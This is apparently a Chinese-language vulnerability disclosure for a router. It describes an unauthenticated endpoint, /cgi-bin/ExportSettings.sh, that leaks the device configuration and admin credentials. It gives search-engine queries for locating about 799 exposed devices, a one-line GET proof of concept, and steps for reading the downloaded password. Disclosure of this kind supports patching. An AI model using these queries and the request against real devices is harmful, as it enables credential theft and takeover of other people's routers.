漏洞描述:
該漏洞由於cgi-bin/ExportSettings.sh未對使用者進行身份驗證,導致攻擊者能夠未授權獲取到路由器設定資訊,包含了後臺管理員使用者的賬號和密碼
fofa: title="互聯世界 物聯未來-登入"
鷹圖: web.body="互聯世界 物聯未來-登入"
POC: GET /cgi-bin/ExportSettings.sh
漏洞復現:
fofa搜尋,共有799條資產
訪問資產IP,在URL後拼接/cgi-bin/ExportSettings.sh,可以下載資訊檔案
使用記事本檢視,獲取到了管理員登入賬號和密碼
